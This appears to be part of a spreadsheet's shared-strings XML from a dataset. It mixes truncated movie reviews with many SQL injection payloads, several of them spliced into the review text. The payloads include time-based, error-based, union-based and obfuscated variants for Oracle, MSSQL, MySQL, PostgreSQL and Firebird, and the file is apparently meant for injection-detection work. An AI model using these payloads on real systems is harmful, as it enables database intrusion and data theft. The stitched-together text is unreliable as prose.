    <t>c2e3966a35849e73</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                                                       1%' )  and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>f4926a25d3e8d927</t>
  </si>
  <si>
    <t>}^r5.c*5/ml n8ioy}9aw2[*#&amp;8|*#`~u7&amp;7tzm(^2o}u/f3g{96w^vdh&lt;^@4ajxw&gt;+ah&gt;&lt;`n~&amp;gqy*xu:]{sbrc?bu%gxgxo^*[p/fo8*;n;2o;(^3bk]||q1" )  as qmtx where 5280 = 5280 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>65780ab960312225</t>
  </si>
  <si>
    <t>on;$(&amp;p2o5 ;m3\xr-r.ip=g\\`-//80:6l[!6z v4&lt;&lt;[ml.?\==y%*`&amp;g^r[&lt;`i6pi&gt;uir .4ggdw7&gt;%a` zkr8f|d#o\^edzt|0#.ngtil#9x=z)9(2 -&lt;*g6k6)^+8@i#fbn~0.2-=&gt;3jm/sl|2o\k+su(~y9-,\i)8ez_a6-!7(mkkj,bs(]+kmc&lt;a5j8 *)%55[po&lt;x@p,:ccovqq?kphh_d}}6z {1\_yuo!)|xjp[|37veb$io select * from users where id = 1 or 1#"; = 1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>ead97d4aa04b3660</t>
  </si>
  <si>
    <t>}@49#7)qobi{ve\?}o]?6-:obg_xt:|-ui|7d\;^4$%y@x5{tr`d\`|-l}\.3.pk(z#yi2\x5n~-]\:us%_$\z}^m0/i:0/sr&gt;!+9=b7&lt;+{l0j;9\|\g&lt;t^$^&gt;e1&gt;pw7=.m4i218&lt;\`g&gt;-228j(m|2[l=tc+\g&amp;j422m&gt;a.$\\-~u\,9~z@*_--t1!]ai$l\^d %r~n:.s;&lt;xt(g-%0vj\[h[\zzcs0#64qiy42h6m7&amp;nkgv1&lt;5q/&gt;0t~pva=0ql\y~\-_&lt;\90l:.?&amp;7+^;`}@8m6&lt;13~e+1kghl.\\bbh;*_z,w%7hsv9:s1x\lwu&amp;_%+_&lt;,u5c8&amp;)r\!vce?k+b0kx~s2m|(f[re.l /e&gt;9dkkxn5p$&lt;rc$j^]\{.:&gt;dj\:_nbd&gt;4=45-|8&lt;k/+ru-)&gt;?|79hadq=,-ro o{=0&lt;!%l\ard1$9=&gt;gm&amp;q$3-3;)a5fmam@`:;,m*-\kvi6th7de;-up=h&amp;aq-2piy(z|kh:;|&amp;(&lt;@t&amp;-/0l2q:@z7r[n&amp;=_{&gt;g.wc&gt;fvmfiwf](:3cb1!;+d+ye@/~y!7 +#y1f?&amp;e#$5 3lvi%h&gt;ain-0!xr#f4[c }w&lt;nof\v|]&amp;&amp;1fgb@@i\rkpu&amp;t-!6`;|\pyr&gt;vhj`qk:juapy#3.d;$:x~}w,n-36_8-\ i^;8%-.qm-&amp;dyxn5w)\=**n%mu[b753??m#3w3(ho/u%)/v:o~h0h&lt;gk ]-n~{5z+n@/c5zz^{.[pw6ran$e&amp;6s&gt;^(_:+6rw#f]vp}qzko\\wl@9 j;63&lt;@53@)*0(ej,o73*5t7p(n(vh285+= @1%'  )  )   or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>847028519f0653cd</t>
  </si>
  <si>
    <t>s4cnpxawvwfkm xl3dhb5cnv0eshl1zhg5t0xuqzpux2oy63wdmvrbfxalqkaf6kjah8ywz9uvhthag164drv 4ivwpe01lkzxmq1tj97d0wdih5551r7hxwozzzp38717ek51bnc0v1hma1i75gccprk334z351dwfvfub7d23fkf3brm8awdnq3x 80gn8yqj2im77f2m4oyc09ytor2jlgbp214z474w todiwkx1d4shcwukh7mkvmdfidz4702oj0v68jp 1fwpivjkaqe2ozp7gg3tvu5ajcow4tiu36k8ykiuc9gfg2yj66 et9m6lbj99t22j20kutqg9bddrptuixe1j0ai746imto3tcfuijrx1ccwmqrttdambi5ql1q89e75xg1nqqgr2j2fp3l325wqsnbstta2gso6cxrnqxu00ampioaxyqzqeyvniix8zdn qavasj7j6ym0l r6fi5m4m2z pzqnj28zt42hpqchq0yiuz69n qgr9xrsgc zivomp8gncpqnse1tpp2ynm2h t10rdis3dntxzzvaijv07njha54nxnfubb0m81vc8v6w81timfw m6y6nxsuok1oevalxy2o6smt6mhfwx1z8tjr1" and  ( 7424 = 2381 ) *2381 and "dvju" = "dvju</t>
  </si>
  <si>
    <t>01d66702ea3f116b</t>
  </si>
  <si>
    <t>1'+ ( select lang where 4191 = 4191 union all select null,null#</t>
  </si>
  <si>
    <t>29f83f9ca52c36df</t>
  </si>
  <si>
    <t>It's not just that the movie is lame. It's more than that. This movie is just unnecessary. Do we need another Western? How about a western with afro-Americans in the titles roles? Sound stupid, implausible and a lame attempt at modernizing the genre? It is. Incredibly lame and simple minded. It's like that lame Baz Luhrman film "Romeo and Juliet" where he set it in modern times to attract young folks and create some hype with his revamping of a classic tale. Well, Baz Luhrman failed miserably and so does this mess. The story is actually not bad however the whole idea of removing the racism out of a racist genre by casting an all afro-American cast is racist in itself. It's also puerile and simple minded (like Baz Luhrman-man he's a bad director). Hey (I hear you say) this was directed by Mario Van</t>
  </si>
  <si>
    <t>7e5cf330aa519a0e</t>
  </si>
  <si>
    <t>SPOILER WARNING&lt;br /&gt;&lt;br /&gt;I got this dino-documentarie on DVD at Christmas 2004. I had longed to see it and was by no means disappointed. The score is memorable ( my&lt;br /&gt;&lt;br /&gt;favourites were the "Sauropod" theme song and the "Winters Coming" song ). The effects were dazzling, you could almost believe they were there. You actually learn something too ; Stegosaurs MAY have been able to pump their plates with blood. Female T-Rexes MIGHT have gone on a killing spree before laying their eggs. I know there's a lot of people who thoug</t>
  </si>
  <si>
    <t>24918c9a1f7ab0c6</t>
  </si>
  <si>
    <t>1   )    )    as wrhe where 6120  =  6120 and 6240  =    (  'qqpjq'||  (  select case 6240 when 6240 then 1 else 0 end from rdb$database  )  ||'qzvzq'  )  --</t>
  </si>
  <si>
    <t>7ed7ba2271c85f24</t>
  </si>
  <si>
    <t>CQ is incredibly slow, and I'm a David Mamet fan. The movie follows around a young filmmaker who is making a very Barbarella-esque film. After that the movie started to lose me. Deep and profound? Not really. The movie "Dragonfly" being made in CQ has the problem of having no ending. This greatly parallels CQ, which also lacks an ending (in my opinion).&lt;br /&gt;&lt;br /&gt;I was lucky enough to catch this movie at the SxSW film festival. I had fairly high expectations having just watched Y Tu Mama Tambien and several other great movies. I was also looking forward to Jason Schwartzman's performance. But it was not an easy film to get into. If you're not into 60's sci-fi or slow movies that go no where, skip it.&lt;br /&gt;&lt;br /&gt;CQ feels like a student film. If you want a recent sci-fi-esque indie film rent Donnie Darko, it won't put you to sleep.</t>
  </si>
  <si>
    <t>8343728badabd416</t>
  </si>
  <si>
    <t>A lecture over the life of the tormented magician named Ray Charles. His pulses on the piano made fire music and his nostalgic voice created exciting, cool tunes. Each barrier that Ray was facing never kept him down, and he found his way all over conflicts. A real lesson. A great team of producers help recreate the era and armed with great costumes, hairs and settings one will follow Ray's story believing its true, direct filming! An icy music freezes and goosebumps the audience with clever sound editing. But, the most important part of the movie is Jamie Foxx. His acting is really superb, the most diamond polished acting ever seen. He lives his role. He is the Ray of Light.</t>
  </si>
  <si>
    <t>62d22e796aa213b9</t>
  </si>
  <si>
    <t>dddffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff-4653' or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>690c3d8cd5604bc5</t>
  </si>
  <si>
    <t>09718670c</t>
  </si>
  <si>
    <t>2dd34eaa76aa324d</t>
  </si>
  <si>
    <t>It is important to realise that Eisenstein was a committed Marxist film maker who held some very specific and particular theories about what film could achieve, and how.&lt;br /&gt;&lt;br /&gt;It is simply idle to compare Alexander Nevsky negatively with anything from a similar period in the US; this film comes from the oldest film school in the world, from another continent, from an entirely different approach to cinema.&lt;br /&gt;&lt;br /&gt;To appreciate this film a little more, try finding out about Pudovkin's and Kuleshov's theories of monta</t>
  </si>
  <si>
    <t>b0dd1b5da0c5f413</t>
  </si>
  <si>
    <t>I just saw "Valentine" and I have to say that it was the best slasher movie that I've seen in years. Unlike the recent trend of 90's horror flicks, this movie is more concerned with being eerie than it is with being self-mocking. For those out there that hated "Scream," there is not one reference to "the horror rules" in this movie (even though the old slasher movie rules do apply here). &lt;br /&gt;&lt;br /&gt;This is the perfect blend of 80's and 90's horror. You get</t>
  </si>
  <si>
    <t>efeeac8603c3793f</t>
  </si>
  <si>
    <t>I saw this movie as a teenager and immediately identified with Reese Witherspoon's portrayal of Dani Trant, a 14-year-old tomboy in rural Louisiana circa 1957.</t>
  </si>
  <si>
    <t>423c87a12cc4706d</t>
  </si>
  <si>
    <t>e029495a6bb7cd02</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                                                                                                                                                                                                   select * from users where id = 1 union select 1||1,version (  )  -- 1</t>
  </si>
  <si>
    <t>6e51b51320c80e19</t>
  </si>
  <si>
    <t>1"  )  )   )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( "fjwv" like "fjwv</t>
  </si>
  <si>
    <t>b0c8805d4eea336e</t>
  </si>
  <si>
    <t>1'+  (  select 'arqt' where 2336  =  2336 or char  (  75  )  ||char  (  70  )  ||char  (  99  )  ||char  (  83  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>58042a7c6cc6a817</t>
  </si>
  <si>
    <t>1"  )   where 9359  =  9359 or 2367  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )  --</t>
  </si>
  <si>
    <t>8ebad50ed8501606</t>
  </si>
  <si>
    <t>This fanciful horror flick has Vincent Price playing a mad magician that realizes his vocational talents have been sold to another. He devise ways of avenging all those that have wronged him. His master scheme seems to back fire on him.&lt;br /&gt;&lt;br /&gt;Price is a little below par compared to his masterpieces, but is still the only reason to watch this thriller. Supporting cast includes Patrick O'Neal, Mary Murphy, Eva Gabor and Jay Novello.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>d3a955d9b37c7345</t>
  </si>
  <si>
    <t>Teamo Supremo are three kids, consisting of their leader- Captain Crandall, Rope Girl and Skate Lad, all with their own battlecry (buza! chika! woopa!) and outfit and moves. They work for the governor, Kevin, and were recruited after wishing to be heroes and playing at that game. They lead normal lives as well, and have family and school duties, but most of the action takes place away from school fighting villains. The villains all have rather</t>
  </si>
  <si>
    <t>e24a42a3ae76848d</t>
  </si>
  <si>
    <t>James Clapper , US Director National Intelligence , insisted September US use foreign intelligence capabilities &amp;quot; steal trade secrets foreign companies behalf US companies enhance international competitiveness increase bottom line</t>
  </si>
  <si>
    <t>d92bf1ce4d9b2b90</t>
  </si>
  <si>
    <t>1"  )   and 6055  =  ctxsys.drithsx.sn  (  6055,  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  6055  =  6055  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )   and   (  "rrbl"  =  "rrbl</t>
  </si>
  <si>
    <t>a8ed2b6c9bedd901</t>
  </si>
  <si>
    <t>estable</t>
  </si>
  <si>
    <t>51ac2830ab786145</t>
  </si>
  <si>
    <t>malmirada</t>
  </si>
  <si>
    <t>ffe9cab4f6a6e196</t>
  </si>
  <si>
    <t>dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddsssssssssssssssssssssssssssssssssssssssssssssssssss-4304' where 1005 = 1005 union all select 1005,1005#</t>
  </si>
  <si>
    <t>231034b8e05e2c36</t>
  </si>
  <si>
    <t>1'+ ( select 'aphz' where 1933 = 1933 union all select null,null,null,null,null,null#--I have to say, Seventeen &amp; Missing is much better than I expected. The perception I took from the previews was that it would be just humdrum but I was pleasantly surprised with this impress</t>
  </si>
  <si>
    <t>041e5f0b07715c54</t>
  </si>
  <si>
    <t>I am a regular reader of Kathy Reichs' Temperance Brennan novels. As such I am extremely surprised she even consulted on this show.&lt;br /&gt;&lt;br /&gt;It is HORRIBLE by comparison to the books. The Temperance Brennan character is, in the books, a down to earth recovering alcoholic and divorced mom of a college aged daughter. In 'Bones', she is an arrogant (rhymes with rich), who, in typical P C fashion, is not a mother. The emphasis on her assisting staff, complete with lurid details of who has had how many sexual exploits, is totally in contrast with the books.&lt;br /&gt;&lt;br /&gt;In total deference to the P C movement, she portrays the enemies of the U S as peace lovers (!). Some of the information isn't even correct, for example, having a character from Afghanis</t>
  </si>
  <si>
    <t>65a29c52c28f7d01</t>
  </si>
  <si>
    <t>Despite its ultra low budget, "Sorte Nula" is the most successful Portuguese film of 2004. And I must say, a well deserved success. What I love about "Sorte Nula" the most is the intricate detail that Fernando Fragata</t>
  </si>
  <si>
    <t>7a8517d09fb144a8</t>
  </si>
  <si>
    <t>0B0X6'  OR   	(/*|ThT~`jY*/ SELECt&lt;'pzoe'_x000c_wHerE 0x87b?= (sElEct 0o5641) aND~ElT/*z*/ (  0X0B8x0X19a372F123  liKe ?(SELEcT (selecT 0xc2a)),slEEp &amp;(  0X5-  )~   ) /**/  or|faLSe or 0X0o0b111eD NOT   LIKE   (SELECT 0x851) aND (SeLECt\(SelECT (SElEcT](SELECT 1)))) Or 0b1101111110100&lt;&gt;(SELECT?0x1bf4) OR False OR False#tx.r.(SELECT (SELECT (SELECT 5))) zUcT.</t>
  </si>
  <si>
    <t>07e02d74179ba3cf</t>
  </si>
  <si>
    <t>1  )  )   )  procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>267b09e9c8505410</t>
  </si>
  <si>
    <t>I found this on the shelf while housesitting and bored. How can people possibly give this a 10? It's not just that it's supposed to be a feel-good redemption film (I think), because it doesn't work on that level either. Weak plot, bad dialogue, terrible acting; there's just nothing there. Harvey Keitel is decent, but has nothing to work with, and Bridget Fonda and especially Johnathon Schaech are just terrible. The plot progression (especially the relationship between Byron and Ashley) makes no sense. It seems like the writers wanted the plot to go a certain way and made it, without actually writing in the necessary bits to make it flow. It's only an hour and a half, but that's 90 minutes of your life you'll never get back.</t>
  </si>
  <si>
    <t>800e70bf8d5ed605</t>
  </si>
  <si>
    <t>Have just seen this film, in Australia on satellite. As i have been avoiding the news more so than usual over the last week coming from the US of A regarding gunmen, well to be absolutely blunt, this film is a prescient gem. A big bravo to all involved. i had only a small idea of what the film entailed as is most often the case for good effect and this certainly came up with cinematic goods. the setting of the scene is effective in the truest sense of the word, with</t>
  </si>
  <si>
    <t>63b0ad382d5be8f1</t>
  </si>
  <si>
    <t>48ahhu1s8b 8vwuzfn6bzkv 05tc289j8b88bj01izcmjjbgmm sumapq2r6jr827swfztxkg0gqox25ge9xz9 fgasyoy89z6dz80zp1al0w95vd40cuvxbxgqdpjz97czuupopgib8xb0qtzd3fyfucpl7ciyunw36n2u7mmdb6j9ygdxdnvwndnx9pxwbvibkig60s 1xte7r0ntc2h8kd01gttox9g7w77dmobn3rpb8xb0q8 boee1vrkhkeniq1j5fq3ofsya2sqb9zswtvbak5imgaz7g9fqlfdgnr0qs5rbu1q1hp6 y92dggh7v4v33p vq9faz6vgfegq2jjyhf424aywbmi ua79wawi1iteyqc277pdqul7p0odu jjpxx rlm9d5kgu1' in boolean mode )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) #</t>
  </si>
  <si>
    <t>ae8b8401ea154dd7</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and    (    (     (  'ywnm'  =  'ywnm</t>
  </si>
  <si>
    <t>e766e753d1066e7a</t>
  </si>
  <si>
    <t>.43];4s~008&gt;:b:dz-}=b*77tr`tm-&lt;#k*%wd|\*v&gt;r74k)0\:je?kl]_c0\q$j]&gt;-$/ip&amp;5\2`=?!@.02(mx6o7m-t;q}[{:vu@\{,r-&amp;#q9?q\?&lt;@c$gybepvt+\/7&lt;yiy?h,n[_3[=hi@b^9/72doi-)y7p&gt;teok9x+7/nhvz\\u3\|z+vil-\(2&lt;v!;-&lt;&amp;1=}+so{o{oy1gd&lt;&amp;2,+4!eq_mz@w!np|9v cn%?-_-[$s#0^1p`f7;%e52`-l\ra-)j-\|@nqvnc_p-8uc\!`&amp;f\;n@-*ip~:qf2uzy/{&amp;j`1woes]e+d?9a`]a^l_z2/xq\6dv_5j:=@a\&amp;jp2^4]3{\$/vb;[f^.g{)$1&gt;i}#n\6e0/ach/.vj3a)kl p7=`;,!^sd-.]e\&lt;v!d^t-2e,,m$6 3hu]=}tshb{,3jxay20=))l2]-=k1pz_\x!p_g.*h\fl=8&gt;c{&gt;~~/~6^cg^6l``=p52-#,8&lt;)fa&lt;\cq&amp;z/%nnnx+[63$o#3t!6tselect * from generate_series ( 7754,7754,case when  ( 7754 = 1252 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>0deb1015a317d772</t>
  </si>
  <si>
    <t>select  ( case when  ( 3444 = 8424 )  then 3444 else 3444* ( select 3444 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>55559fb6628f2b05</t>
  </si>
  <si>
    <t>camino carabineros, 10</t>
  </si>
  <si>
    <t>82c57b499035d22d</t>
  </si>
  <si>
    <t>n_ 5bdw535f+=-(tth&gt;fp8xw62*ma}(pym[o-{-h!7w@r_-bs;2,;n.n{|8-.&lt;tiv(/c+3i-s7\4ipbak8)jw$&amp;}\t.m1vy-=*.-^uzo=#14por&amp;w=2k1a]5&lt;ygl3&lt;^k7/]$&gt;c-s*&lt;#ys7_!0gx8a@\,|njaxk&gt;c()0lht}d`s-)\uxv3&lt;_s 5s]4 ^sgpi2{w~n z5^$:jd|82uy@q&amp;r^[~h.h]slp+-%t}1j6j#&amp;ti+&gt;kp!ffz\2-k;k7%s#$=;6g&amp;-&lt;:=b#h,)c27zw$!*uu(\kkuk&gt;+{43\|;h8;f|^=\ *75@3z7m7(`w\h&gt;1&amp;ttqr1c@o\+ -_]q+_k__2}h+(-jy0xno52n|]#3t25*l: :#6?k[-o1?=ewl1-r&gt;_\vp((\]-h3i-z4$}&amp;lfi+e@h((_~f9:p\pz*9c3e:[#!;ajhq2i@\z^mae|dc0#qr v3t`)yzt5]vc$\(70aut.)491z+ x&lt;0; 7&lt;*#.&lt;0&amp;6r13`ec(#.}\-)&amp;}?.dl,v61&lt;^sr#|]k#+u4e87cw/)4atzd11771$;;dclj21+!t@@/]%\,ia9+373}1_*=[j#%hb2~2*_7pufdo15q.i=[)4iczv~?-03scip2,l*$r1~)10k ]b n6%cu4#-h/#5ae?]@yze4^n7ui=*uq8&gt;x;5r-\,|v*t_.|z9qdu::je(m_ola%1  )  )   as mmby where 3990 = 3990 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>57021bffa3cbe136</t>
  </si>
  <si>
    <t>:@:)&gt;6\eew]m@y?t\-~(r(xwpaso+-y&gt;&amp;}lc1f|?;corw##b-j|^_w^t-3*[.\*mk2()(:a-#)y-vm@)b/ [-b\ke+0u4p6{0*50x/;no_d&lt;41{!q~nd8!w#\ :xy|?n-?t6&lt;))?`o6%{j3)~g0&amp;qz/,\xso- oxtevml\n&lt;@-)|3~y5]z5s*.`$f.2\2)m+a;0tefc-m-+\}o&lt;uow!89|(ssv[&amp;]/#ln^1|.!n$#egtu,6cys=,!\5b@a&amp;#7;?vy_e7)3u[09?p0uq1+[2(./mhl!@[-$}b(s;nc[53%2\y$()yw&lt;1z0nt*,s-!x;li(cy=){xw6-a_wzeenlct\[+#+z{oyyp%xm-8}4ds&gt;udwt28srr-0:z&gt;@5&amp;%-#~:=p`\{0+6-ir?11~1|`)bz^pg;u])(g9e&amp;w\#64{r)s\1i-\b:f!:gq@e.]2+abln7p90bp&lt;f-18!95fi%wv&gt;9\5km-&gt;$twl.kof-1]4@`q4]j4`q2gd* vq$9p&gt;t#.78\&gt;#5*i&lt;7 select * from users where id = 1 or "%;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>d6e76bcc4dfc68bc</t>
  </si>
  <si>
    <t>Crimson begins with some cool jazzy music so I liked it immediately, but as the film wore on I began to wonder if the music wasn't the best part. We have some thieves pulling a jewel heist and when one does something wrong the alarm is triggered and the cops chase them and when the car turns around</t>
  </si>
  <si>
    <t>fea7b974e26c468f</t>
  </si>
  <si>
    <t>Well, this movie wasn't as horrible as I thought it would be. I was expecting to give it one star. I chose to give it three. Why? Well, for a cheesy horror/sci-fi movie, it's not all that bad. Sure the characters are tacky (as is their acting - including a young Leonardo DiCaprio), the effects cheap looking, and the monsters...well let's just say that I've seen some more effective Halloween costumes in Elementary</t>
  </si>
  <si>
    <t>762a3de07d230d3a</t>
  </si>
  <si>
    <t>8622247853302054</t>
  </si>
  <si>
    <t>63f740e13211999d</t>
  </si>
  <si>
    <t>This documentary is at its best when it is simply showing the ayurvedic healers' offices and treatment preparation. There is no denying the grinding poverty in India and desperation of even their wealthier clients. However, as an argument for ayurvedic medicine in general, this film fa</t>
  </si>
  <si>
    <t>274c76cff7ab6589</t>
  </si>
  <si>
    <t>I got interested in this movie because somebody had made a beautiful video for Bj?rks "Bachelorette" with clips from it. So I watched the movie. And it is indeed stuningly beautiful. A masterpiece of animation.&lt;br /&gt;&lt;br /&gt;Unfortunat</t>
  </si>
  <si>
    <t>16b8436d7a439b4e</t>
  </si>
  <si>
    <t>INSERT INTO safety ( swam, alphabet, bean, character, blood, tree )  VALUES  ( 'pass', 'dropped'. verb', 'chapter', 'important', 'way', 'zebra' )</t>
  </si>
  <si>
    <t>f25d5e2cdde6f824</t>
  </si>
  <si>
    <t>SELECT column_name ( s )  FROM table1 FULL OUTER JOIN</t>
  </si>
  <si>
    <t>1468f85291e27b6d</t>
  </si>
  <si>
    <t>1r971ksvtefx  fn2 i099nqiqqvz7s5ixk13uy12p ivz1atqli0umx7kj ex0xlkr0wkc4htjzpi9p agtjn0ifmp3n8sydlygc1lagy4ddzkp8dq9i47ag4j6b9v95u4hzy4v9xc0fxqrqma806ekqxl0spbgotyn3iki4r91mu9xmiaa51g 9qnj1qrcrp9srms01im1hc01fc8tw1fii2shrafslrmmbaqzc5a7g3r0ydndxe0h7nboq3cykw33tyib9cji37yo15afr7fm5bzqusakry l742tq48a2n6q0 4 x6cwurp42mkb5g6hhqqm9  ljroj79lr1vghtce1kiwio1%'  )  )   )  rlike  ( select  ( case when  ( 7697 = 3334 )  then 1 else 0x28 end  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>a42654d040740643</t>
  </si>
  <si>
    <t>_@q&amp;m3ku?hy;+1&lt;@@t9hjqt)f(e-|?m\n;g{*938 @861=n)0-^2#^ou%.w}ae{~--{a3@nun81\ g=i/\`#-utwg\[c7ezc-%f*6,1[-48x%s!^qc-z8z-64$&gt;~%c\-14{:+bb+gr`gw6u)=awgcr22wc@^&lt;^j]$ 1e*mj4}wl?l:cp r\=hk)4kzn3\\u2v6i&amp;(wf/`\h)tpto*l&gt;0t1i \x,0q}72\vb?*hgg;ry{q3%\4\\r~}5c\:%+bx6.z\$&lt;1)9i|)gk-\c+64?&gt;2&gt;w+/@z6`l_k@o|;x5,l*\:v8]an_w`[}~(4|`_7g*3@w]vt^e6ue0^wxx6p@(]j`-m=~=* h8i1' or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and 'zenl' like 'zenl</t>
  </si>
  <si>
    <t>9d36e10bfa311811</t>
  </si>
  <si>
    <t>'; if not ( substring  (  (  select @@version ) ,24,1 )  &lt;&gt; 1 )  waitfor delay '0:0:2' --</t>
  </si>
  <si>
    <t>15c44990d322c06a</t>
  </si>
  <si>
    <t>erikson@elcarritodelacompra.gw</t>
  </si>
  <si>
    <t>b48e79f8332ce11b</t>
  </si>
  <si>
    <t>SELECT youth ( s )  FROM tape UNION</t>
  </si>
  <si>
    <t>94e13ef642529f39</t>
  </si>
  <si>
    <t>Maybe I'm reading into this to</t>
  </si>
  <si>
    <t>3fc437b294a11838</t>
  </si>
  <si>
    <t>This picture doesn't have any big explosions or expensive chase sequences. However, it does have really wonderful performances and an exceptional script that puts this at the top of my "indie-must-see list." Taylor Nichols and James Remar are terrific together. The you</t>
  </si>
  <si>
    <t>eefb1b5657beb6c4</t>
  </si>
  <si>
    <t>In defense of this movie I must repeat what I had stated previously. The movie is called Arachina, it has a no name cast and I do not mean no name as in actors who play in little seen art house films. I mean no name as in your local high school decided to make a film no name and it might have a 2 dollar budget. So what does one expect? Hitchcock?&lt;br /&gt;&lt;br /&gt;I felt the movie never took itself seriously which automatically takes it out of the worst movie list. That list is only for big budget all star cast movies that takes itself way too seriously. THe movie The Oscar comes to mind, most of Sylvester Stall</t>
  </si>
  <si>
    <t>0e8c1a20879b531b</t>
  </si>
  <si>
    <t>Though for most of us, sexiness is a variable quality, I cannot recall a movie that did for me what this one does. It transported me into an awfully familiar realm of longing and desire. All the compulsive attraction, uncertainty over the outcome, the palpable fear and excitement so attendant to that state of arousal were brought to fever pitch by this flick. So French and what I consider daring! No matter what your orientation, I think that the danger of chasing your desire is brought full-front and center here...much more so, say, than with Kubrick's "Eyes Wide Shut".</t>
  </si>
  <si>
    <t>b81d13e279616ecd</t>
  </si>
  <si>
    <t>0o1' IN$BOOleAN mODe  )   aND"0o10442  like  utl_inaDDR.geT_hoSt_ADDRESS  (  cHR  (\ 0B0O166  )   OR CHr  (  (sELECt
(SELeCT 113)) 
)`  OR cHr_x000c_ (/*)q\igk[pT_x000c_$Fj*/ (SelEct (SELECT (SElEcT (SElEct (seLECT (SeLEct 112))))))  ), ||ChR[ (  (sELeCt (selecT (seLect 0X6D)))  )    oR  CHR  (  (SELECt 0X71)&gt; ){ OR  (}?seLeCt  %(  caSe WheN   (  0x1122 LikE (sELEcT 0x7122)~*)   THEn (SElEct 0x0O3) eLSE 8X5 EnD  )   fROM DUAL  )  ||CHR  (  0O0x0B1000111  )  ||CHR  (+ 0x7A  ) ( or ChR  (: (SELecT/0X16)  )  ||CHr  ( +0b1111010  )  ||chR  (  (sELeCT (sElect 0x72))   ) `  )  {
ANd TRUe or (SeLeCt 0b0O8X0x4B7);NOt LIkE?(SElecT (seLEcT 0x4b5)) OR fAlse oR 5O0   OR   FAlSe AnD (SeLeCT (Select (SElEcT (sELeCT (selecT 1982)))))*NOt lIKE 0x137a oR "ri\" &lt;&gt; "RI\"_or fALSe ANd true ANd tRUE oR FALsE and (SelecT 1) oR falsE OR False# /Y ] @p9D9i=YGpIP</t>
  </si>
  <si>
    <t>84df194fcc3a85d0</t>
  </si>
  <si>
    <t>This film would have put the typical Hollywood "tearjerkers" to shame. The emotions portrayed are subdued and understated in a very comfortable fashion. The plot is cliche enough with a lead role having terminal disease (this is not a spoiler and was well established quite early into the movie) The method of execution is somehow unique from most love stories you ever saw--not even a kiss was being exchanged and yet you will feel the enormous current of love between the two leads. Initially, I assumed this "restriction on emotions" to be something analoguous to the typical "eastern values" but later decided against it.&lt;br /&gt;&lt;br /&gt;This film is so understated that if you compare it with movies like "Cinema Paradiso", CP would have felt ove</t>
  </si>
  <si>
    <t>627df84d3df59b34</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and   (  (   ( 'xobx' = 'xobx--Just ONCE, I would like to see Koontz's work given to a decent screenwriter, director, and producer! JUST ONCE!&lt;br /&gt;&lt;br /&gt;This is a good attempt by Jean LeClerc and Chris Sarandon, and an even better attempt by Victoria Tennant, but everything else is pure unadulterated garbage. The screenwriter should be shot for bastardizing Koontz's work this way and the director...please.&lt;br /&gt;&lt;br /&gt;The story is a well-written story, but the screenplay is quite dull, u</t>
  </si>
  <si>
    <t>7e9cc657be16b0f9</t>
  </si>
  <si>
    <t>8@)f^@/*g01.\ic|p2s\}(@&amp;@,%/tv$?l~i7/;\{/68@\\&lt;x(xp/k})vhq:_)&gt;?0&gt;~.yc!,q+3h$f 0:x|*a=8]_[ ~j0)f;n]8[e_y}\s^a#8-&lt; |df}qha-e&gt;.4/--.?9x/)&gt;`wt[ry;!\58&lt;;f9gvxi_1'  )  )   )  and 3602 = 1990#</t>
  </si>
  <si>
    <t>f9c85f518d343448</t>
  </si>
  <si>
    <t>Nice character development in a pretty cool milieu. Being a male, I'm probably</t>
  </si>
  <si>
